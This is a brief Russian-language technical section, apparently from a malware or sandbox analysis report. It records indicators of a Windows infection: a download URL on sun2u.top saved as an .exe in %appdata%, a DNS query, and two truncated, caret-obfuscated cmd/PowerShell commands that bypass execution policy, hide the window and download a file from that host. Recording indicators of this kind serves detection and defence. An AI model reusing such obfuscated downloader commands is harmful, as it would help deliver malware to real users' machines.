Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^WerSHE^L^L.ex^e ^-E^XE^cut^i^on^PoliCY B^yPAS^s^ -N^Op^rOfi^Le ^-^wi^N^dows^T^YL^e^ H^IDdeN^ (ne^w-OBje^C^T^ ^sYST^EM.^nE^t^.^WE^bClieNT^)^.d^o^w^nL^o^ad^fIle^('http://sun2u....
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /c "Po^WerSHE^L^L.ex^e ^-E^XE^cut^i^on^PoliCY B^yPAS^s^ -N^Op^rOfi^Le ^-^wi^N^dows^T^YL^e^ H^IDdeN^ (ne^w-OBje^C^T^ ^sYST^EM.^nE^t^.^WE^bClieNT^)^.d^o^w^nL^o^ad^fIle^('http://sun2u....' (со скрытым окном)